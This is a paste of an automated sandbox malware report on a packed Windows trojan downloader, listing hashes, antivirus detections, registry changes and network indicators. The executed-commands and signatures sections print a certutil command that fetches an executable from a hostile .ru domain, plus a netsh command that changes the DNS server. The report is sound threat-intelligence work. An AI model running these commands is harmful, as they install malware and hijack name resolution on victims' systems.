Advertisement
paladin316

1729Exes_a11eb542f7afda5d8488efda4cdf28ee_1_2019-09-13_05_30.txt

Sep 13th, 2019
1,713
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.51 KB | None | 0 0
  1.  
  2. * ID: 1729
  3. * MalFamily: "Deepscan"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Exes_a11eb542f7afda5d8488efda4cdf28ee.1"
  8. * File Size: 53248
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  10. * SHA256: "77e5c80fce0688599dc9369959d7263dca2b685d3cfe2c48f906b1e2665298b2"
  11. * MD5: "a11eb542f7afda5d8488efda4cdf28ee"
  12. * SHA1: "b1baa315e22cba5da3930445455257c4e755d648"
  13. * SHA512: "483f9dc02f78fbb3a0079fbbb0a3146155ff678438be05c46967a037c18ac1a080adfa118a6cd0156d6cfc173395aec43bbdd2f3776948fd62823dd2ffa9678e"
  14. * CRC32: "924623F0"
  15. * SSDEEP: "1536:dRkq4IrZntb4tGkX4N8C7RTupN+ObUSnnouy8:dKMhcGw4NZun+21out"
  16.  
  17. * Process Execution:
  18. "yar35M546r6hg.exe",
  19. "cmd.exe",
  20. "certutil.exe",
  21. "netsh.exe"
  22.  
  23.  
  24. * Executed Commands:
  25. "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\"",
  26. "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\"",
  27. "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe",
  28. "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
  29.  
  30.  
  31. * Signatures Detected:
  32.  
  33. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  34. "Details":
  35.  
  36.  
  37. "Description": "A process attempted to delay the analysis task.",
  38. "Details":
  39.  
  40. "Process": "yar35M546r6hg.exe tried to sleep 353 seconds, actually delayed analysis time by 0 seconds"
  41.  
  42.  
  43.  
  44.  
  45. "Description": "A process created a hidden window",
  46. "Details":
  47.  
  48. "Process": "yar35M546r6hg.exe -> C:\\Windows\\sysnative\\cmd"
  49.  
  50.  
  51.  
  52.  
  53. "Description": "The binary likely contains encrypted or compressed data.",
  54. "Details":
  55.  
  56. "section": "name: UPX1, entropy: 7.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0000c600, virtual_size: 0x0000d000"
  57.  
  58.  
  59.  
  60.  
  61. "Description": "The executable is compressed using UPX",
  62. "Details":
  63.  
  64. "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00010000"
  65.  
  66.  
  67.  
  68.  
  69. "Description": "Uses Windows utilities for basic functionality",
  70. "Details":
  71.  
  72. "command": "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
  73.  
  74.  
  75. "command": "\"C:\\Windows\\sysnative\\cmd.exe\" /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
  76.  
  77.  
  78. "command": "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
  79.  
  80.  
  81. "command": "C:\\Windows\\sysnative\\cmd /c \"C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat C:\\Users\\user\\AppData\\Local\\Temp\\yar35M546r6hg.exe\""
  82.  
  83.  
  84. "command": "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
  85.  
  86.  
  87. "command": "netsh interface ip set dns \"??????\" source=static addr=114.114.114.114 register=primary"
  88.  
  89.  
  90.  
  91.  
  92. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  93. "Details":
  94.  
  95. "MITRE T1127 - certutil": "(Tactic: Defense Evasion)"
  96.  
  97.  
  98. "MITRE T1105 - certutil": "(Tactic: Command And Control, Lateral Movement)"
  99.  
  100.  
  101.  
  102.  
  103. "Description": "File has been identified by 45 Antiviruses on VirusTotal as malicious",
  104. "Details":
  105.  
  106. "MicroWorld-eScan": "DeepScan:Generic.Malware.SDTk.1EB60964"
  107.  
  108.  
  109. "FireEye": "Generic.mg.a11eb542f7afda5d"
  110.  
  111.  
  112. "CAT-QuickHeal": "Trojan.CoinMinerPMF.S2180977"
  113.  
  114.  
  115. "McAfee": "Artemis!A11EB542F7AF"
  116.  
  117.  
  118. "K7AntiVirus": "Trojan ( 0051918e1 )"
  119.  
  120.  
  121. "Alibaba": "TrojanDownloader:Win32/Generic.4cc3db15"
  122.  
  123.  
  124. "K7GW": "Trojan ( 0051918e1 )"
  125.  
  126.  
  127. "Cybereason": "malicious.2f7afd"
  128.  
  129.  
  130. "TrendMicro": "TROJ_GEN.R002C0PHO19"
  131.  
  132.  
  133. "Symantec": "Trojan.Gen.MBT"
  134.  
  135.  
  136. "APEX": "Malicious"
  137.  
  138.  
  139. "Paloalto": "generic.ml"
  140.  
  141.  
  142. "ClamAV": "Win.Malware.Xtrat-6913730-0"
  143.  
  144.  
  145. "Kaspersky": "HEUR:Trojan-Downloader.BAT.Generic"
  146.  
  147.  
  148. "BitDefender": "DeepScan:Generic.Malware.SDTk.1EB60964"
  149.  
  150.  
  151. "Avast": "Win32:Malware-gen"
  152.  
  153.  
  154. "Endgame": "malicious (moderate confidence)"
  155.  
  156.  
  157. "Sophos": "Mal/Generic-S"
  158.  
  159.  
  160. "F-Secure": "Heuristic.HEUR/AGEN.1035551"
  161.  
  162.  
  163. "DrWeb": "BackDoor.Xtreme.38"
  164.  
  165.  
  166. "VIPRE": "Trojan.Win32.Generic!BT"
  167.  
  168.  
  169. "Invincea": "heuristic"
  170.  
  171.  
  172. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.qc"
  173.  
  174.  
  175. "Trapmine": "malicious.high.ml.score"
  176.  
  177.  
  178. "Emsisoft": "DeepScan:Generic.Malware.SDTk.1EB60964 (B)"
  179.  
  180.  
  181. "Ikarus": "Backdoor.Xtreme"
  182.  
  183.  
  184. "Jiangmin": "RiskTool.BitCoinMiner.gwc"
  185.  
  186.  
  187. "Webroot": "W32.Trojan.GenKDZ"
  188.  
  189.  
  190. "Avira": "HEUR/AGEN.1035551"
  191.  
  192.  
  193. "Microsoft": "Trojan:Win32/ScarletFlash.A"
  194.  
  195.  
  196. "Arcabit": "DeepScan:Generic.Malware.SDTk.1EB60964"
  197.  
  198.  
  199. "AegisLab": "Trojan.BAT.Generic.a!c"
  200.  
  201.  
  202. "ZoneAlarm": "HEUR:Trojan-Downloader.BAT.Generic"
  203.  
  204.  
  205. "GData": "DeepScan:Generic.Malware.SDTk.1EB60964"
  206.  
  207.  
  208. "Acronis": "suspicious"
  209.  
  210.  
  211. "ALYac": "DeepScan:Generic.Malware.SDTk.1EB60964"
  212.  
  213.  
  214. "Ad-Aware": "DeepScan:Generic.Malware.SDTk.1EB60964"
  215.  
  216.  
  217. "Cylance": "Unsafe"
  218.  
  219.  
  220. "Zoner": "Trojan.Win32.73853"
  221.  
  222.  
  223. "TrendMicro-HouseCall": "TROJ_GEN.R002C0PHO19"
  224.  
  225.  
  226. "SentinelOne": "DFI - Malicious PE"
  227.  
  228.  
  229. "Fortinet": "W32/GenericRXGY.II!tr"
  230.  
  231.  
  232. "AVG": "Win32:Malware-gen"
  233.  
  234.  
  235. "CrowdStrike": "win/malicious_confidence_100% (W)"
  236.  
  237.  
  238. "Qihoo-360": "HEUR/QVM18.1.674F.Malware.Gen"
  239.  
  240.  
  241.  
  242.  
  243. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  244. "Details":
  245.  
  246. "target": "clamav:Win.Malware.Xtrat-6913730-0, sha256:77e5c80fce0688599dc9369959d7263dca2b685d3cfe2c48f906b1e2665298b2, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  247.  
  248.  
  249.  
  250.  
  251. "Description": "Suspicious use of certutil was detected",
  252. "Details":
  253.  
  254. "command": "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe"
  255.  
  256.  
  257.  
  258.  
  259. "Description": "Uses suspicious command line tools or Windows utilities",
  260. "Details":
  261.  
  262. "command": "certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe"
  263.  
  264.  
  265.  
  266.  
  267.  
  268. * Started Service:
  269.  
  270. * Mutexes:
  271. "Local\\ZoneAttributeCacheCounterMutex",
  272. "Local\\ZonesCacheCounterMutex",
  273. "Local\\ZonesLockedCacheCounterMutex"
  274.  
  275.  
  276. * Modified Files:
  277. "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.bat",
  278. "\\Device\\KsecDD",
  279. "\\Device\\Http\\Communication"
  280.  
  281.  
  282. * Deleted Files:
  283. "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp",
  284. "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp",
  285. "C:\\Users\\user\\AppData\\Local\\Temp\\ADD6.tmp\\ADE6.tmp\\ADE7.tmp",
  286. "C:\\Windows\\system\\debug",
  287. "C:\\Windows\\python36",
  288. "C:\\Windows\\cerB0C4.tmp"
  289.  
  290.  
  291. * Modified Registry Keys:
  292. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  293. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  294. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  295. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
  296. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
  297. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
  298. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
  299. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
  300. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
  301. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
  302. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
  303. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
  304. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
  305. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
  306. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
  307. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
  308. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
  309. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
  310. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
  311. "HKEY_CURRENT_USER\\SYSTEM\\CurrentControlSet\\Control\\NetTrace",
  312. "HKEY_CURRENT_USER\\System\\CurrentControlSet\\Control\\NetTrace\\Session"
  313.  
  314.  
  315. * Deleted Registry Keys:
  316. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  317. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  318. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  319. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  320.  
  321.  
  322. * DNS Communications:
  323.  
  324. "type": "A",
  325. "request": "down.us-hack.ru",
  326. "answers":
  327.  
  328.  
  329.  
  330. * Domains:
  331.  
  332. "ip": "14.29.194.121",
  333. "domain": "down.us-hack.ru"
  334.  
  335.  
  336.  
  337. * Network Communication - ICMP:
  338.  
  339. * Network Communication - HTTP:
  340.  
  341. * Network Communication - SMTP:
  342.  
  343. * Network Communication - Hosts:
  344.  
  345. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement